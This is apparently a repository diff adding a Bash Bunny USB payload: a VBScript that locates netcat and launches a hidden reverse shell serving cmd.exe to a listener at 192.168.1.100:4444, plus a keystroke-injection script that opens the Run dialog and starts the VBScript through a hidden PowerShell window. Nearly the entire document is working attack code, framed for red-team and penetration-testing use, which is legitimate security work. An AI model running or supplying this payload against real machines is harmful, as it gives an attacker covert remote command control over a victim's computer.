RAZ_VBScript

This payload executes a VBScript as the payload.  The sample VBScript creates a netcat reverse shell, but any VBScript can be substituted.  netcat.exe must be sourced elsewhere.

payloads/library/RAZ_VBScript/a.vbs

@@ -0,0 +1,162 @@
+Option Explicit
+
+'==============================================================================
+' Title:         a.vbs
+' Author:        RalphyZ
+' Version:       1.0
+' Target:        Windows 7+
+'
+' Description:
+' This VBScript is used by a BashBunny payload to
+' to create a netcat reverse shell.  The netcat listener
+' IP Address and Port are stored in separate files - so that
+' Red Teams can quickly change information.  The "IncrementPort"
+' subroutine will increase the port number by 1 every time the
+' script is called.  This is so that you can start multiple
+' listeners while doing a PenTest, and grab multiple reverse
+' shells in one trip.  Uncomment that if you want the auto-increment
+'
+' Note: You must put the netcat executable in the strReverseShellPath directory
+'==============================================================================
+
+' Declare Constants
+Const ForReading = 1
+Const ForWriting = 2
+
+' Declare Global Variables
+Dim strListenerPort, strNewListenerPort, strListenerIP
+Dim objFSO, objFile, strCurrentDirectory
+Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile
+
+' The netcat executable name
+strNetCatEXE = "nc.exe"
+
+' The folder location
+strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
+
+' The file containing the listener port
+strListnerPortFile = "listener_port.txt"
+
+' The file containing the listener ip address
+strListenerIPFile = "listener_ip.txt"
+
+' Create a File System Object
+Set objFSO = CreateObject("Scripting.FileSystemObject")
+
+strCurrentDirectory = FindCurrentDirectory()
+
+' Read the Host IP Address (where the listener resides)
+ReadHostIP
+
+' Read the listener port
+ReadPort
+
+' Increment the listener port - for multiple shells
+' Great for Red Teams
+'IncrementPort
+
+' Start NetCat Reverse Shell
+StartNetCat
+
+'==============================================================================
+'       Name: FindCurrentDirectory
+'  Arguments: None
+' Return Value: None
+' Description: Find the netcat executable
+'==============================================================================
+Function FindCurrentDirectory
+    Dim objDrives, d
+    
+    ' Set default return value
+    FindCurrentDirectory = ""
+    
+    ' Search all drives for the netcat exe
+    Set objDrives = objFSO.Drives
+    For Each d in objDrives   
+        If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then
+            FindCurrentDirectory =  d + strReverseShellPath        
+        End if
+    Next
+End Function
+
+'==============================================================================
+'       Name: ReadHostIP
+'  Arguments: None
+' Return Value: None
+' Description: Read the listener IP                                         
+'==============================================================================
+Sub ReadHostIP()
+    ' Opens the file for reading
+    Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading)
+    
+    ' Read the host IP
+    strListenerIP = objFile.ReadAll
+    
+    ' Close the file
+    objFile.Close    
+End Sub
+
+
+'==============================================================================
+'       Name: ReadPort
+'  Arguments: None
+' Return Value: None
+' Description: Read the listener port                                          
+'==============================================================================
+Sub ReadPort()
+    ' Opens the file for reading
+    Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading)
+    
+    ' Read the listener port
+    strListenerPort = objFile.ReadAll
+    
+    ' Close the file
+    objFile.Close
+End Sub
+
+'==============================================================================
+'       Name: IncrementPort
+'  Arguments: None
+' Return Value: None
+' Description: Read the listener port, increment the counter by 1, and write   
+'             the new value                                                   
+'==============================================================================
+Sub IncrementPort()    
+    ' Increment the listener port
+    strNewListenerPort = strListenerPort + 1
+    	
+    ' Open the file that contains the listener port for writing
+    Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting)
+    
+    ' Write the new (incremented) port
+    objFile.WriteLine strNewListenerPort
+    
+    ' Close the file
+    objFile.Close
+End Sub
+
+'==============================================================================
+'       Name: StartNetCat
+'  Arguments: None
+' Return Value: None
+' Description: Start netcat on the appropriate port
+'==============================================================================
+Sub StartNetCat()
+    Dim strNetCat, strCommand, objShell
+    
+    ' Build the path to the netcat executable    
+    strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE)
+    
+    ' Create the command string to run netcat on the correct ip and port, 
+    ' and serve cmd.exe to the listener
+    strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe"
+      
+    ' Create the WScript Shell object       
+    Set objShell = WScript.CreateObject ("WScript.Shell")
+    
+    ' Run the command (' , 0'= hidden)
+    objShell.run strCommand, 0
+    
+    ' Free the object from memory
+    Set objShell = Nothing
+End Sub

payloads/library/RAZ_VBScript/listener_ip.txt

@@ -0,0 +1 @@
+192.168.1.100

payloads/library/RAZ_VBScript/listener_port.txt

@@ -0,0 +1 @@
+4444

payloads/library/RAZ_VBScript/payload.txt

@@ -0,0 +1,35 @@
+#!/bin/bash
+#
+# Title:         RAZ_VBScript
+# Author:        RalphyZ
+# Version:       1.0
+# Target:        Windows 7+
+# Dependencies:  VBScript (a.vbs) in the switch folder with this file
+# 
+# Description:   Executes a VBScript, concealed in a hidden PowerShell window
+#
+# Colors:
+# Green.....................Working
+# White.....................Completed without error
+# Light-Blue (blinking).....a.vbs was not found
+
+LED G
+ATTACKMODE HID STORAGE
+
+# Get the switch position
+source bunny_helpers.sh
+
+# Check if a.vbs is present
+if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
+    LED B G 100
+    exit 1
+fi
+
+# Run the VBScript
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
+QUACK ENTER
+
+# Green LED for finished
+LED R G B